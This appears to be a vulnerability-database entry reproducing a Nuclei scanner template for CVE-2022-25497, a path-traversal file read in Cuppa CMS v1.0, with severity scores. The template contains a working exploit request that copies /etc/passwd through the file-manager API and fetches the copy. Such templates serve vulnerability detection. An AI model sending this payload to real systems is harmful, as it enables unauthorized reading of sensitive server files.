Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-25497
HistoryApr 21, 2023 - 8:56 a.m.

Cuppa CMS v1.0 - Local File Inclusion

2023-04-2108:56:01
ProjectDiscovery
github.com
cve
cuppa
lfi
intrusive
unauthorized
access

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS

0.004

Percentile

73.6%

CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
id: CVE-2022-25497

info:
  name: Cuppa CMS v1.0 - Local File Inclusion
  author: theamanrawat
  severity: medium
  description: |
    CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25497
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-25497
    cwe-id: CWE-552
    epss-score: 0.00508
    epss-percentile: 0.7649
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms

http:
  - raw:
      - |
        POST /js/filemanager/api/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../{{randstr}}.txt","action":"copyFile"}
      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - text/plain

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206c4df5d2066e6268f3acbd183dc87c66c840453a576c416933e1d15f0d828d3c022100a4a86a643deb305983a1eacca72a65d4c2a3cb0b64dafefbdfdcd898c74bc4d6:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS

0.004

Percentile

73.6%

Related for NUCLEI:CVE-2022-25497